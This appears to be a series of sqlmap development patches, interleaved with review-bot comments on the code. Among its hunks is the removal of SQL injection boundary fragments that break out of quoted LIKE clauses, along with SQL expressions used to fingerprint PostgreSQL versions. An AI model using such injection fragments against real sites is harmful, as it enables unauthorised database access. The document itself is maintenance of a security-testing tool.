deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c4144f9020b..9b8340d19e4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.10" +VERSION = "1.2.7.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index a9a50633f94..0e577de4e4a 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -100,9 +100,9 @@ def checkDbms(self): if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): Backend.setVersion(">= 10.0") elif inject.checkBooleanExpression("SIND(0)=0"): - Backend.setVersion(">= 9.6.0", "< 10.0") + Backend.setVersionList([">= 9.6.0", "< 10.0"]) elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): - Backend.setVersion(">= 9.5.0", "< 9.6.0") + Backend.setVersionList([">= 9.5.0", "< 9.6.0"]) elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 93f7d99b504..09890837e70 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f140b81ca26a2eb0e071cb6837352d28 lib/core/settings.py +048446ac83a95b7b5d017366bcf4485d lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
@@ -185,7 +185,7 @@ bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py +d30806e39996e6d273f0af888f5710a4 plugins/dbms/postgresql/fingerprint.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py From 29dcdd3befac5674bf7a19902ad1194f89015f4a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Jul 2018 15:35:07 +0200 Subject: [PATCH 203/428] Potential patch for #3178 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index f060039e6c9..8d866cefda6 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2334,7 +2334,7 @@ def getUnicode(value, encoding=None, noneToNull=False): try: return unicode(value, UNICODE_ENCODING) except: - value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] + value = getUnicode(value[:ex.start], UNICODE_ENCODING) + u"".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + getUnicode(value[ex.end:], UNICODE_ENCODING) elif isListLike(value): value = list(getUnicode(_, encoding, noneToNull) for _ in value) return value diff --git a/lib/core/settings.py b/lib/core/settings.py index 9b8340d19e4..9e178cc5ca3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
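Review bot: The new line in `getUnicode` reads `ex.start` and `ex.end` inside a bare `except:` that does not bind `ex`, so the offsets come from an enclosing handler outside the hunk and describe an earlier decode failure, not the one the inner `unicode(value, UNICODE_ENCODING)` call just raised; the recursive `getUnicode(value[:ex.start], ...)` / `getUnicode(value[ex.end:], ...)` calls may therefore split the bytes at a position that does not belong to this attempt. Binding the inner exception explicitly, `except UnicodeDecodeError, ex:` (the file uses Python 2 syntax), and keeping a bare `except:` only for the non-decode case would make the recursion operate on the right offsets. The reverted form restored by the following commit ("Revert of last commit (Fixes #3179)") carries the same unbound-`ex` reference, so the observation applies to both hunks.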
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.11" +VERSION = "1.2.7.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 09890837e70..9bfa4046fe6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py +63472d70c4cc55b7a48ae4109e8feac3 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -048446ac83a95b7b5d017366bcf4485d lib/core/settings.py +30b23e73b463c1026467930e0b2aa763 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From 5cc36a57361f0d808e7b22016c19c5e05efa57df Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 10 Jul 2018 15:54:06 +0200 Subject: [PATCH 204/428] Revert of last commit (Fixes #3179) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8d866cefda6..f060039e6c9 100644 --- a/lib/core/common.py 
+++ b/lib/core/common.py @@ -2334,7 +2334,7 @@ def getUnicode(value, encoding=None, noneToNull=False): try: return unicode(value, UNICODE_ENCODING) except: - value = getUnicode(value[:ex.start], UNICODE_ENCODING) + u"".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + getUnicode(value[ex.end:], UNICODE_ENCODING) + value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:] elif isListLike(value): value = list(getUnicode(_, encoding, noneToNull) for _ in value) return value diff --git a/lib/core/settings.py b/lib/core/settings.py index 9e178cc5ca3..bd142423bd3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.12" +VERSION = "1.2.7.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9bfa4046fe6..3c50cc32945 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -63472d70c4cc55b7a48ae4109e8feac3 lib/core/common.py +ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -30b23e73b463c1026467930e0b2aa763 lib/core/settings.py +2f2c4fe68780abcae94f5b4ea7650387 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py From 3c439c3929b5625b85f2db670e3f20386eacbf0e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Jul 2018 16:12:57 +0200 Subject: [PATCH 205/428] Known cause of majority of false-positives (Issue #3176) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +-- xml/boundaries.xml | 72 -------------------------------------------- 3 files changed, 3 insertions(+), 75 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bd142423bd3..6f13d38cfc9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.13" +VERSION = "1.2.7.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3c50cc32945..81db47e4e10 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2f2c4fe68780abcae94f5b4ea7650387 lib/core/settings.py +2c474df57ac9d142f8747701b70082a5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py @@ -465,7 +465,7 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml +201b8bb7888f500294a9831bb47ce7a7 xml/boundaries.xml 0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml diff --git a/xml/boundaries.xml b/xml/boundaries.xml index b4fa0b71072..497edda8677 100644 --- a/xml/boundaries.xml +++ b/xml/boundaries.xml @@ -293,78 +293,6 @@ Formats: AND "[RANDSTR]" LIKE "[RANDSTR] - - 2 - 1 - 1,2 - 2 - %') - AND ('%'=' - - - - 3 - 1 - 1,2 - 2 - %')) - AND (('%'=' - - - - 4 - 1 - 1,2 - 2 - %'))) - AND ((('%'=' - - - - 1 - 1 - 1,2 - 2 - %' - AND '%'=' - - - - 4 - 1 - 1,2 - 2 - %") - AND ("%"=" - - - - 5 - 1 - 1,2 - 2 - %")) - AND (("%"=" - - - - 5 - 1 - 1,2 - 2 - %"))) - AND ((("%"=" - - - - 3 - 1 - 1,2 - 2 - %" - AND "%"=" - - 1 1 From 4846d85ccd885a77980438d9b38d475aeb6e91e3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 11 Jul 2018 19:30:14 +0200 Subject: [PATCH 206/428] Pre-fetching latest revision number in case of update --- lib/core/common.py | 16 ++++++++++++++++ lib/core/settings.py | 2 +- lib/core/update.py | 6 ++++++ txt/checksum.md5 | 6 +++--- 4 files changed, 26 insertions(+), 4 deletions(-) 
diff --git a/lib/core/common.py b/lib/core/common.py index f060039e6c9..eb28e355c63 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3347,6 +3347,22 @@ def unhandledExceptionMessage(): return errMsg +def getLatestRevision(): + """ + Retrieves latest revision from the offical repository + """ + + retVal = None + req = urllib2.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py") + + try: + content = urllib2.urlopen(req).read() + retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P[\d.]+)", content) + except: + pass + + return retVal + def createGithubIssue(errMsg, excMsg): """ Automatically create a Github issue with unhandled exception information diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f13d38cfc9..74e88c05652 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.14" +VERSION = "1.2.7.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index b9a54e54998..e027024e399 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -17,6 +17,7 @@ from lib.core.common import dataToStdout from lib.core.common import getSafeExString +from lib.core.common import getLatestRevision from lib.core.common import pollProcess from lib.core.common import readInput from lib.core.data import conf @@ -25,6 +26,7 @@ from lib.core.revision import getRevisionNumber from lib.core.settings import GIT_REPOSITORY from lib.core.settings import IS_WIN +from lib.core.settings import VERSION from lib.core.settings import ZIPBALL_PAGE from lib.core.settings import UNICODE_ENCODING 
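Review bot: `urllib2.urlopen(req).read()` in the new `getLatestRevision()` has no timeout, so an unreachable or slow `raw.githubusercontent.com` can block the update path indefinitely before the user is even prompted, and the bare `except: pass` then hides whatever went wrong (including `KeyboardInterrupt` on Python 2). Pass an explicit bound, e.g. `content = urllib2.urlopen(req, timeout=10).read()` (10 is a constructed value; use the project's usual request timeout), catch `except Exception:` and log at debug level so a failed version check is at least visible in verbose output. This is also an outbound HTTPS request made during `--update`, and on Python 2 interpreters older than 2.7.9 `urllib2` does not validate the server certificate, so the fetched string should stay informational only — it is only compared against `VERSION` here, which is fine, but that expectation is worth a comment. The docstring misspells "official" as "offical".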
@@ -39,6 +41,10 @@ def update(): warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY logger.warn(warnMsg) + if VERSION == getLatestRevision(): + logger.info("already at the latest revision '%s'" % getRevisionNumber()) + return + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" if readInput(message, default='N', boolean=True): directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 81db47e4e10..c3b4fe4e97c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -ab2f7ecb7d3dff9afd05675031942e8e lib/core/common.py +5e498b6dd232bca7c698699cf5ceec03 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
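Review bot: The new early return in `update()` compares `VERSION` with the fetched value but logs `getRevisionNumber()`, so the message reports a git revision for a check that was made on the version string; the two can disagree, and if the revision is unavailable (e.g. a tree not obtained with git) the `'%s'` would print `None`. Logging the value actually compared, `logger.info("already at the latest revision '%s'" % VERSION)`, keeps the message truthful. Because `getLatestRevision()` returns `None` on any failure, a failed fetch is indistinguishable here from "not latest" and falls through to the zipball prompt; a `logger.debug` for the `None` case would make that behaviour explainable. `update()` begins before the hunk.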
@@ -48,14 +48,14 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2c474df57ac9d142f8747701b70082a5 lib/core/settings.py +5d09048bf6682159e784d762a2772137 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -9d395b143be295a143eb5c9b926f3569 lib/core/update.py +b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From a4796550973f00422784a9e4a3ec1569773a275d Mon Sep 17 00:00:00 2001 From: Anastasios Stasinopoulos Date: Sun, 15 Jul 2018 12:28:34 +0300 Subject: [PATCH 207/428] Minor patch (--purge instead of --purge-output) (#3188) --- lib/parse/cmdline.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 062f52c6f3a..ab2fbe8ebb8 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py 
@@ -875,7 +875,7 @@ def _(self, *args): args.url = args.url or DUMMY_URL if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge or --dependencies), " errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) From 741ce9e3f0a736934615d09d936ad700add8897b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 15 Jul 2018 16:08:01 +0200 Subject: [PATCH 208/428] Trivial update (just to reset checksums) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index eb28e355c63..48af95c4f75 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3764,7 +3764,7 @@ def __init__(self): logger.debug(debugMsg) else: found = sorted(options.keys(), key=lambda x: len(x))[0] - warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) + warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) warnMsg += "Resolved to shortest of those ('%s')" % found logger.warn(warnMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 74e88c05652..643cfe6a019 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.15" +VERSION = "1.2.7.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c3b4fe4e97c..a7533dd1cf7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -5e498b6dd232bca7c698699cf5ceec03 lib/core/common.py +b703bb5160945067a36c6827c34e1624 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5d09048bf6682159e784d762a2772137 lib/core/settings.py +c2887e721f068a7f5060c70662b70809 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py 
@@ -59,7 +59,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -3dd11b8be62e15a9d54cf5f08c603ffc lib/parse/cmdline.py +bc34167c7accc61df07b2982cddd0338 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 6bb486c1bffe94663142308334f644809bc3f1da Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 18 Jul 2018 15:34:38 +0200 Subject: [PATCH 209/428] Potential patch for #3192 --- lib/core/settings.py | 2 +- lib/core/target.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 643cfe6a019..34763d9d5ba 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.16" +VERSION = "1.2.7.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index c20adfb8faa..bceafe5c86c 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -671,6 +671,8 @@ def _createTargetDirs(): conf.outputPath = tempDir + conf.outputPath = getUnicode(conf.outputPath) + try: with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a7533dd1cf7..54ffa406c26 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -48,10 +48,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c2887e721f068a7f5060c70662b70809 lib/core/settings.py +44a45f6e35fa61d620c82b71a72ecbde lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -95f04c1c1d8c3998d86e1bdf0e12771c lib/core/target.py +12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py From 9f2bc0042691da409523e0aae1accfa440897421 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 18 Jul 2018 16:30:59 +0200 Subject: [PATCH 210/428] Minor patch --- lib/core/settings.py | 2 +- lib/core/threads.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 34763d9d5ba..bcb8cb18b61 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.17" +VERSION = "1.2.7.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/threads.py b/lib/core/threads.py index c1e05cb14a1..a0bf58e3738 100644 --- a/lib/core/threads.py +++ b/lib/core/threads.py @@ -168,6 +168,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio except (KeyboardInterrupt, SqlmapUserQuitException), ex: print + kb.prependFlag = False kb.threadContinue = False kb.threadException = True 
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 54ffa406c26..c936dc4bb88 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,12 +48,12 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -44a45f6e35fa61d620c82b71a72ecbde lib/core/settings.py +4c4a8178e4fd6e1fa8225c8c08815cd0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py -de9922a29c71a235cb95a916ff925db2 lib/core/threads.py +e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py From a0cbf6991d92c24a37e8fb106ce8bb1e7a3f00c8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 18 Jul 2018 17:00:34 +0200 Subject: [PATCH 211/428] Minor style update --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 15 +++++++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 16 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bcb8cb18b61..dcad0b64c87 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.18" +VERSION = "1.2.7.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index 1299206c09b..e641d43cc2d 100644 
